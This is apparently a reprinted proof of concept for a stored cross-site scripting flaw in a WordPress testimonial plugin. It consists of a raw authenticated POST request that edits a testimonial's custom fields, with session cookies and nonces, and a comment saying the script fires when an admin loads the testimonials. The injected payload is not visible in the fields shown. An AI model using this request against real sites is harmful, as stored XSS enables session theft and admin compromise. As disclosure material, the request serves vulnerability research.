/ * Original reprint please indicate https://www.wpon.cn.11294.html By xiarou page * / POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/post.php?post=176&action=edit X-WP-Nonce: c12330b50c Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286 Origin: http://example.com Content-Length: 2729 DNT: 1 Connection: close Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_wpnonce" c627da8fa4 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/wp-admin/post.php?post=176&action=edit -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="user_ID" 3 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="action" editpost -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="originalaction" editpost -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="post_type" testimonial -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="original_post_status" publish -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="referredby" http://example.com/testimonial/alerttitle/ -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_wp_original_http_referer" http://example.com/testimonial/alerttitle/ -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="post_ID" 176 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="meta-box-order-nonce" e78bbacfea -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="closedpostboxesnonce" cb99c6138d -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="samplepermalinknonce" 97e0ac6960 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="my-custom-fields_wpnonce" f842632466 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_ikcf_client" -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_ikcf_email" test@gmail.com -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_ikcf_position" -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_ikcf_other" -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name="_ikcf_rating" -----------------------------1097171016543246544154165286-- #XSS TRIGGER POINT: When an admin or authenticate user load contents of all testimonials.